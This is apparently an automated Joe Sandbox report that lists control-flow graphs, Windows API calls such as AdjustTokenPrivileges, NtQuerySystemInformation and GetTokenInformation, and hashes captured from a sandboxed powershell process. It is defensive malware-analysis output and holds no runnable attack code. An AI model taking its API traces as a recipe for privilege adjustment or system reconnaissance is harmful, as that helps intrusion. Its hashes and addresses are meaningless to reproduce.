1934->1935 1880 1caa1a8 1881 1caa1ee EnumWindows 1880->1881 1883 1caa246 1881->1883 1822 2731316 1824 2731345 WriteConsoleW 1822->1824 1825 2731364 1824->1825 1826 2731116 1827 2731142 SetThreadUILanguage 1826->1827 1828 273116e 1826->1828 1829 2731157 1827->1829 1828->1827 1904 1caaf24 1906 1caaf42 K32EnumProcessModules 1904->1906 1907 1caafc6 1906->1907 1936 1cababe 1937 1cabafa GetConsoleScreenBufferInfo 1936->1937 1939 1cabb37 1937->1939 1845 2730886 1848 27308bb ReadFile 1845->1848 1847 27308ed 1848->1847 1908 1caa33c 1909 1caa36a SetErrorMode 1908->1909 1911 1caa3ab 1909->1911 1968 2730784 1969 27307c6 GetFileType 1968->1969 1971 2730828 1969->1971 1853 1caba32 1855 1caba6a CreateFileW 1853->1855 1856 1caba86 1855->1856 1860 273060e 1861 273063a UnmapViewOfFile 1860->1861 1862 273066c 1860->1862 1863 273064f 1861->1863 1862->1861 1940 1caacb7 1941 1caacc1 AdjustTokenPrivileges 1940->1941 1943 1caad3f 1941->1943 1944 1caa8b4 1945 1caa8d4 VerLanguageNameW 1944->1945 1947 1caa958 1945->1947

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 126 1caacb7-1caad1b 130 1caad1d 126->130 131 1caad20-1caad2f 126->131 130->131 132 1caad72-1caad77 131->132 133 1caad31-1caad51 AdjustTokenPrivileges 131->133 132->133 136 1caad79-1caad7e 133->136 137 1caad53-1caad6f 133->137 136->137
                    APIs
                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CAAD37
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: AdjustPrivilegesToken
                    • String ID:
                    • API String ID: 2874748243-0
                    • Opcode ID: 22d3e5297f796816ce9f0cc316ce1cfd316cef2fc1b2ca3a2fb95e665987d342
                    • Instruction ID: 820a8ec01734a432cfddeb1086798d684ad2adf36e94a12e4934b8be0411b913
                    • Opcode Fuzzy Hash: 22d3e5297f796816ce9f0cc316ce1cfd316cef2fc1b2ca3a2fb95e665987d342
                    • Instruction Fuzzy Hash: 1021D1765097809FEB238F25DC40B52BFB4EF07314F0884DAE9848B163D271E908CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CAAD37
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: AdjustPrivilegesToken
                    • String ID:
                    • API String ID: 2874748243-0
                    • Opcode ID: 392128cf24480f5cdd9e068ce358a19948265d54de8956cdb10984d809aff0a6
                    • Instruction ID: aba12c777e8614a7e59da0e939ca6899f5a3073fca36c25e497f14582ae90d86
                    • Opcode Fuzzy Hash: 392128cf24480f5cdd9e068ce358a19948265d54de8956cdb10984d809aff0a6
                    • Instruction Fuzzy Hash: 4E11A075900645DFEB21CF65D884B56FBE4EF04324F08C4AAED898B622D371E514CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CAB329
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: InformationQuerySystem
                    • String ID:
                    • API String ID: 3562636166-0
                    • Opcode ID: 5f763bef7dbda1be4e6156eaa5b585bb8675d848c3d9cf7354e71c305e2240e9
                    • Instruction ID: ceeb5a4456df471b489757e19acc21e418d947c528c29d7a7843dfbd02a037a4
                    • Opcode Fuzzy Hash: 5f763bef7dbda1be4e6156eaa5b585bb8675d848c3d9cf7354e71c305e2240e9
                    • Instruction Fuzzy Hash: 3111C271409780AFDB228F14DC45F62FFB4EF06224F09C49EED844B263C275A918CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CAB329
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: InformationQuerySystem
                    • String ID:
                    • API String ID: 3562636166-0
                    • Opcode ID: a8a186c19b237190c400c63ac231505250e5a80cca28d1b6c20a40bc1bd33199
                    • Instruction ID: 164ddff8126ab3274d7cccb2a42f5e08cee01ada94094287526a7cc876c76d1d
                    • Opcode Fuzzy Hash: a8a186c19b237190c400c63ac231505250e5a80cca28d1b6c20a40bc1bd33199
                    • Instruction Fuzzy Hash: 3001A235401744DFEB21CF55D885B21FBA0FF05724F08C09ADD490B216C376E918CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemInfo.KERNELBASE(?), ref: 0273099C
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: InfoSystem
                    • String ID:
                    • API String ID: 31276548-0
                    • Opcode ID: eab29219449fc4cfd1afceadd3e65ae5ef428ff0e2ad2c91f6eb760689cd22d4
                    • Instruction ID: 5da91e642f3b5d0bc291b6e1852ff75e304f85ccba80c04502f2e7943c158c98
                    • Opcode Fuzzy Hash: eab29219449fc4cfd1afceadd3e65ae5ef428ff0e2ad2c91f6eb760689cd22d4
                    • Instruction Fuzzy Hash: CDF0CD749043449FEB21CF55E885726FBA4EF05324F18C0AADD894B317D3BAA508CAA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 273067a-2730706 4 273070b-2730717 0->4 5 2730708 0->5 6 2730719 4->6 7 273071c-2730725 4->7 5->4 6->7 8 2730727-273074b CreateFileW 7->8 9 2730776-273077b 7->9 12 273077d-2730782 8->12 13 273074d-2730773 8->13 9->8 12->13
                    APIs
                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0273072D
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: fc055e7a6d2a64e015827012799286d15a29bfe9f06d02f88af4382775c9868f
                    • Instruction ID: c1c6f93508ea81ec8c17668e5bbdb2cc7824913ddee1502cc8a0e72cceb279f7
                    • Opcode Fuzzy Hash: fc055e7a6d2a64e015827012799286d15a29bfe9f06d02f88af4382775c9868f
                    • Instruction Fuzzy Hash: 84317C71509380AFE722CF61DC85F52BFF8EF06614F08849EE9848B293D375A808CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 16 2730d32-2730db5 20 2730db7 16->20 21 2730dba-2730dc0 16->21 20->21 22 2730dc2 21->22 23 2730dc5-2730dce 21->23 22->23 24 2730dd0-2730dd8 RegisterEventSourceW 23->24 25 2730e1d-2730e22 23->25 27 2730dde-2730df4 24->27 25->24 28 2730df6-2730e1c 27->28 29 2730e24-2730e29 27->29 29->28
                    APIs
                    • RegisterEventSourceW.ADVAPI32(?), ref: 02730DD6
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: EventRegisterSource
                    • String ID:
                    • API String ID: 1693822063-0
                    • Opcode ID: 231a6f67dbe415036280f4ae4eb095c737fc1896e4c91e585dbeba48a9e1ba04
                    • Instruction ID: 267f645e3c553df755b3f075a30395888f5f15d400c84d4b0c8e63c0c08c682e
                    • Opcode Fuzzy Hash: 231a6f67dbe415036280f4ae4eb095c737fc1896e4c91e585dbeba48a9e1ba04
                    • Instruction Fuzzy Hash: 9D31E5B15093806FE722CB65DC45B56BFE8EF06214F1884AEE984CF293D379A909C771
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 45 1cabd1e-1cabdb4 50 1cabe01-1cabe06 45->50 51 1cabdb6-1cabdbe GetTokenInformation 45->51 50->51 52 1cabdc4-1cabdd6 51->52 54 1cabe08-1cabe0d 52->54 55 1cabdd8-1cabdfe 52->55 54->55
                    APIs
                    • GetTokenInformation.KERNELBASE(?,00000E9C,2022FD1E,00000000,00000000,00000000,00000000), ref: 01CABDBC
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: InformationToken
                    • String ID:
                    • API String ID: 4114910276-0
                    • Opcode ID: eaab1dbbf6b84d667f5ba711c61ff848a56fd28b9a9a224486ccc4b3a348060b
                    • Instruction ID: 057b2219b861bb3da89537e155b692bb5394c40c2d3498e947e1cdc146f58519
                    • Opcode Fuzzy Hash: eaab1dbbf6b84d667f5ba711c61ff848a56fd28b9a9a224486ccc4b3a348060b
                    • Instruction Fuzzy Hash: 60318171509384AFD7228B60DC55F96BFB8EF06214F1884DBEA85CB192D268A909C7B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 32 1caaf24-1caafb6 37 1caafb8-1caafc0 K32EnumProcessModules 32->37 38 1cab003-1cab008 32->38 40 1caafc6-1caafd8 37->40 38->37 41 1cab00a-1cab00f 40->41 42 1caafda-1cab000 40->42 41->42
                    APIs
                    • K32EnumProcessModules.KERNEL32(?,00000E9C,2022FD1E,00000000,00000000,00000000,00000000), ref: 01CAAFBE
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: EnumModulesProcess
                    • String ID:
                    • API String ID: 1082081703-0
                    • Opcode ID: 2d9c5db4665f6cde9b62ccce711a7d6f4ebd30797396d412bb3ff51daa82cc5a
                    • Instruction ID: cacbb4ea7cab7996628b8b84c8d948f70c2dd7e9b564d62eac4426d451f3d030
                    • Opcode Fuzzy Hash: 2d9c5db4665f6cde9b62ccce711a7d6f4ebd30797396d412bb3ff51daa82cc5a
                    • Instruction Fuzzy Hash: 2421E4B2509380AFD7128F60DC45B56BFB8EF06324F1884DBE984CB193C364A909CB71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 58 2730fee-27310cf GetVolumeInformationW
                    APIs
                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0273109E
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: InformationVolume
                    • String ID:
                    • API String ID: 2039140958-0
                    • Opcode ID: 96ece6868ccdba3feb2708234e37a93a11d7fe4c668495c3801815a1162d1f4e
                    • Instruction ID: 2c52db5961e4e0bf29dd4f53d965dd1974faf690a7e6730821deef7bcfa8a9c3
                    • Opcode Fuzzy Hash: 96ece6868ccdba3feb2708234e37a93a11d7fe4c668495c3801815a1162d1f4e
                    • Instruction Fuzzy Hash: B2318F7650E3C06FD3138B758C55B56BFB4AF43610F1A81CBD8848F2A3D228A919C7A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 63 1cab01d-1cab087 67 1cab089 63->67 68 1cab08c-1cab0a6 63->68 67->68 70 1cab0a8-1cab0b0 K32GetModuleInformation 68->70 71 1cab0f3-1cab0f8 68->71 73 1cab0b6-1cab0c8 70->73 71->70 74 1cab0fa-1cab0ff 73->74 75 1cab0ca-1cab0f0 73->75 74->75
                    APIs
                    • K32GetModuleInformation.KERNEL32(?,00000E9C,2022FD1E,00000000,00000000,00000000,00000000), ref: 01CAB0AE
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: InformationModule
                    • String ID:
                    • API String ID: 3425974696-0
                    • Opcode ID: 050e231901ead1c8548b33fb61ac73298459720a78689d7d68d58a81395eb9d8
                    • Instruction ID: abcb2dac81c8aa2e9c8e97c752772cd8cbd408f08bc0b5675eeb0ddec095d1bb
                    • Opcode Fuzzy Hash: 050e231901ead1c8548b33fb61ac73298459720a78689d7d68d58a81395eb9d8
                    • Instruction Fuzzy Hash: 9521B1B1505380AFE722CB65DC45F66BFB8EF46224F08849BE945CB152D268E908CB71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 78 2730784-2730811 82 2730813-2730826 GetFileType 78->82 83 2730846-273084b 78->83 84 2730828-2730845 82->84 85 273084d-2730852 82->85 83->82 85->84
                    APIs
                    • GetFileType.KERNELBASE(?,00000E9C,2022FD1E,00000000,00000000,00000000,00000000), ref: 02730819
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: FileType
                    • String ID:
                    • API String ID: 3081899298-0
                    • Opcode ID: 37b5e3effd0c71d98efcc660b6892ceb89b8671c529190c811c722e6cd5fd3b6
                    • Instruction ID: fc65197a4aefd3215cac8f8ae890eac386d2e384559a8f605410b0e338218112
                    • Opcode Fuzzy Hash: 37b5e3effd0c71d98efcc660b6892ceb89b8671c529190c811c722e6cd5fd3b6
                    • Instruction Fuzzy Hash: D721C8768057806FE7128B21EC81BA6BFACEF47324F1985D6E9848B193D2686905C771
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 89 2730464-27304af 90 27304b2-273050a SHGetFolderPathW 89->90 92 2730510-2730526 90->92
                    APIs
                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02730502
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: FolderPath
                    • String ID:
                    • API String ID: 1514166925-0
                    • Opcode ID: b781da6484855fe20c9ecf2c7050137d502e43075d5f5af5ad39ecc4e6e735d6
                    • Instruction ID: 4ea67c40221fdca4e382e2366aad8e283b0a1a2a27e1bb415e90a8ac43cba171
                    • Opcode Fuzzy Hash: b781da6484855fe20c9ecf2c7050137d502e43075d5f5af5ad39ecc4e6e735d6
                    • Instruction Fuzzy Hash: EC21B07240E3C06FD3128B758C56B62BFB4EF47610F1981CFD8848B693D225A919C7B2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 93 1caa1a8-1caa1eb 94 1caa1ee-1caa240 EnumWindows 93->94 96 1caa246-1caa26f 94->96
                    APIs
                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 01CAA23E
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: EnumWindows
                    • String ID:
                    • API String ID: 1129996299-0
                    • Opcode ID: 944cc2401dbf5a95c5998420fa8a8aa22318d2ab3cc1eb54bfd087e06889e010
                    • Instruction ID: 522f4403e0bc4a7a665e81cfd4a591fbdd928905ad5e11486d7049a8c4ee7ed7
                    • Opcode Fuzzy Hash: 944cc2401dbf5a95c5998420fa8a8aa22318d2ab3cc1eb54bfd087e06889e010
                    • Instruction Fuzzy Hash: A721C47240D3C06FD3128B618C55B26BFB4EF47610F1981CBD8848F693D229A919CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 98 273014c-27301ba 102 27301bf-27301c8 98->102 103 27301bc 98->103 104 27301ca-27301d2 SetConsoleTitleW 102->104 105 2730209-273020e 102->105 103->102 106 27301d8-27301ea 104->106 105->104 108 2730210-2730215 106->108 109 27301ec-2730208 106->109 108->109
                    APIs
                    • SetConsoleTitleW.KERNEL32(?), ref: 027301D0
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: ConsoleTitle
                    • String ID:
                    • API String ID: 3358957663-0
                    • Opcode ID: 3c98f2412ed0121232cd16ba49bf933a25f6222d6ef4e9d52bf9db59b2592802
                    • Instruction ID: 35a5172c71b6d921a44274036a7ad9d0a2860c1d3256043e22d96fd9257bd580
                    • Opcode Fuzzy Hash: 3c98f2412ed0121232cd16ba49bf933a25f6222d6ef4e9d52bf9db59b2592802
                    • Instruction Fuzzy Hash: 4221277150D3C49FDB138B659C95696BFB4AF47220F0984EBD885CF1A3D268A809CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 111 27306ae-2730706 114 273070b-2730717 111->114 115 2730708 111->115 116 2730719 114->116 117 273071c-2730725 114->117 115->114 116->117 118 2730727-273072f CreateFileW 117->118 119 2730776-273077b 117->119 121 2730735-273074b 118->121 119->118 122 273077d-2730782 121->122 123 273074d-2730773 121->123 122->123
                    APIs
                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0273072D
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 70120d36abb4e839a0a04c4f43fee7eaeaf718001c41894889d701fe51f5aa16
                    • Instruction ID: aceec81a2cc608b36e7f2797da5b1160b672bae77d19701261675420a2d8066d
                    • Opcode Fuzzy Hash: 70120d36abb4e839a0a04c4f43fee7eaeaf718001c41894889d701fe51f5aa16
                    • Instruction Fuzzy Hash: C4219D71500204AFEB21DF65DC85F66FBE8EF08614F14846EE9898B292D375E908CB72
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 139 2730854-27308dd 143 2730921-2730926 139->143 144 27308df-27308ff ReadFile 139->144 143->144 147 2730901-273091e 144->147 148 2730928-273092d 144->148 148->147
                    APIs
                    • ReadFile.KERNELBASE(?,00000E9C,2022FD1E,00000000,00000000,00000000,00000000), ref: 027308E5
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 3a79d696896ca91a6b3084d297c17c31eea31beb4e7c43cfad856a1119e273e7
                    • Instruction ID: 2e5ae1dbddf94924f57926a638d27783271164ec22b9162020d2e4ae1207d830
                    • Opcode Fuzzy Hash: 3a79d696896ca91a6b3084d297c17c31eea31beb4e7c43cfad856a1119e273e7
                    • Instruction Fuzzy Hash: AD219D72409384AFE7228F60DC45F56BFB8EF46314F1984DBE9848B193C268A509CB72
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 151 1caa8b4-1caa96e VerLanguageNameW
                    APIs
                    • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 01CAA94A
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: LanguageName
                    • String ID:
                    • API String ID: 2060303382-0
                    • Opcode ID: 30faf1d804fd74316746e90670f096956a2e27d8964ca57ac0469bafaea6aa4b
                    • Instruction ID: 0dc23d10f5a23af3fcbcb9f6e92216fd9dd67c1bf753b4a3a101959cccb85ae1
                    • Opcode Fuzzy Hash: 30faf1d804fd74316746e90670f096956a2e27d8964ca57ac0469bafaea6aa4b
                    • Instruction Fuzzy Hash: 7C21D47140D3806FD3138B65DC51B62BFB8EF87B14F1981DBE8848B653D224A919C7B2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 156 2730d66-2730db5 159 2730db7 156->159 160 2730dba-2730dc0 156->160 159->160 161 2730dc2 160->161 162 2730dc5-2730dce 160->162 161->162 163 2730dd0-2730dd8 RegisterEventSourceW 162->163 164 2730e1d-2730e22 162->164 166 2730dde-2730df4 163->166 164->163 167 2730df6-2730e1c 166->167 168 2730e24-2730e29 166->168 168->167
                    APIs
                    • RegisterEventSourceW.ADVAPI32(?), ref: 02730DD6
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: EventRegisterSource
                    • String ID:
                    • API String ID: 1693822063-0
                    • Opcode ID: cf6322120d3ba07ae0a11abd96ea97b45e74390eea7f6d6a8ac4eae67a46d5ba
                    • Instruction ID: 6888d2b99e3aa7c4b0faf4d35cdbde1537f84916db32dfbbb3e21f6dc6a665d5
                    • Opcode Fuzzy Hash: cf6322120d3ba07ae0a11abd96ea97b45e74390eea7f6d6a8ac4eae67a46d5ba
                    • Instruction Fuzzy Hash: 5821C3B1600240AFE721DF65DC85B66FBD8EF05214F14846EE948DB242D775F904CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetTokenInformation.KERNELBASE(?,00000E9C,2022FD1E,00000000,00000000,00000000,00000000), ref: 01CABDBC
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: InformationToken
                    • String ID:
                    • API String ID: 4114910276-0
                    • Opcode ID: 2e0958d340529666d6658b88930bb6b83048cd789f8436e104acb2dc566d2b52
                    • Instruction ID: 8353cd2eb852efb2b46f358c4d4fd9d8b93b2f30956a1d6de3eae9a40919616d
                    • Opcode Fuzzy Hash: 2e0958d340529666d6658b88930bb6b83048cd789f8436e104acb2dc566d2b52
                    • Instruction Fuzzy Hash: 8A11D271900204AFEB21CF65DC85FAAFBACEF04328F14846AEA45CA141D775E904CBB2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • K32GetModuleInformation.KERNEL32(?,00000E9C,2022FD1E,00000000,00000000,00000000,00000000), ref: 01CAB0AE
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: InformationModule
                    • String ID:
                    • API String ID: 3425974696-0
                    • Opcode ID: 6c7a203728a8828c733041986e73aef51c53ea906b9f1d24ad8b20747f454ddb
                    • Instruction ID: e41ae7a4300799f7ecd14eef5fec36d8b2a26a51af9554d9d45d1dd1293efcbb
                    • Opcode Fuzzy Hash: 6c7a203728a8828c733041986e73aef51c53ea906b9f1d24ad8b20747f454ddb
                    • Instruction Fuzzy Hash: AB11B1B1600244EFEB21CF65DC85F6AFBA8EF45224F14846AED09CB241D774E9048BB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: ConsoleWrite
                    • String ID:
                    • API String ID: 2657657451-0
                    • Opcode ID: d192278cd2eecd794d559d8c6e5cc97ae63b94f5e4f1a2efffb143404175e4df
                    • Instruction ID: 5df2762e81207803da88dfa28e76e1b5fbf6e14e98faef3f048da5f4ab7f7968
                    • Opcode Fuzzy Hash: d192278cd2eecd794d559d8c6e5cc97ae63b94f5e4f1a2efffb143404175e4df
                    • Instruction Fuzzy Hash: 0E219F725093809FDB228F65DC45B96FFB4EF06220F0884EAED858B663D235A458CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetDriveTypeW.KERNELBASE(?), ref: 02730FB0
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: DriveType
                    • String ID:
                    • API String ID: 338552980-0
                    • Opcode ID: fd33c9daf4176e75036c9ce4690ed038fdd76bc236da68030e2dc04699e56700
                    • Instruction ID: 30060928961972f19b01c19ed5eb81b947f7bf93679653ae754e8bb7d3c2c9a7
                    • Opcode Fuzzy Hash: fd33c9daf4176e75036c9ce4690ed038fdd76bc236da68030e2dc04699e56700
                    • Instruction Fuzzy Hash: 6C212C6150D7C05FDB138B25DC95B52BFB4AF07224F0D84DAD988CF253D2689508CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CAAB1A
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 9d5ade3b770d2afb1d132d0c42e20d4d58e566000ee603e8934ca2b2198dbe05
                    • Instruction ID: 664aa397e84108a6162f5f81afeba4bf76ff2d97a8b443ec21d05cd02d0113a5
                    • Opcode Fuzzy Hash: 9d5ade3b770d2afb1d132d0c42e20d4d58e566000ee603e8934ca2b2198dbe05
                    • Instruction Fuzzy Hash: D62184716053819FDB22CF29DC45B52BFE8EF46214F0884AAED49CB653D275E804CB71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01CABB2F
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: BufferConsoleInfoScreen
                    • String ID:
                    • API String ID: 3437242342-0
                    • Opcode ID: bd3710fcef9dd8e7f43797d1b09ead0e989e15252a6e8031c175acaff6064d8a
                    • Instruction ID: 187f2e8ef83282bc52b0aaaeea9aed930d3733fe769aacdce6dd5738bd23dc42
                    • Opcode Fuzzy Hash: bd3710fcef9dd8e7f43797d1b09ead0e989e15252a6e8031c175acaff6064d8a
                    • Instruction Fuzzy Hash: C021A1725093C09FDB128F65DC55A92BFB4EF07224F0984DBDD858F263D278A908CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetThreadUILanguage.KERNEL32(?), ref: 02731148
                    Memory Dump Source
